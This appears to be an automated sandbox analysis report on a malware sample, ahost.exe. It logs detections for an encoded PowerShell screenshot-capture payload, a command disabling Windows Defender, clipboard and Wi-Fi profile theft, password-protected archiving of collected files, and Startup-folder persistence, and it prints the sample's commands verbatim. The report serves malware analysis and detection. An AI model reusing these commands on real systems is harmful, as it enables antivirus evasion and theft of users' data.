AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7364, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7440, TargetFilename: C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6184, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *, ProcessId: 5800, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7392, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7600, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8076, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7668, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ahost.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

Code function: 104_2_00007FF7CF89901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

104_2_00007FF7CF89901C

Source: ahost.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: ahost.exe, 00000002.00000002.1877240019.00007FF8E7207000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6AD2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000068.00000000.1738525769.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdb source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: ahost.exe, 00000002.00000002.1883107537.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: ahost.exe, 00000002.00000002.1881541299.00007FF8E83E1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: ahost.exe, 00000002.00000002.1881203499.00007FF8E8381000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: ahost.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: ahost.exe, 00000002.00000002.1882883847.00007FF8F8CA1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdbhPh source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: ahost.exe, 00000002.00000002.1882291196.00007FF8F7A91000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: ahost.exe, 00000002.00000002.1881902584.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: ahost.exe, 00000002.00000002.1880634708.00007FF8E8201000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: oh.pdb. source: powershell.exe, 00000046.00000002.1723901604.0000017B19878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878181431.00007FF8E72FE000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,	0_2_00007FF7F91E92F0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7F91E83B0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F92018E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7F92018E4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,	2_2_00007FF7F91E92F0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF7F91E83B0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	104_2_00007FF7CF8A46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8E88E0 FindFirstFileExA,	104_2_00007FF7CF8E88E0
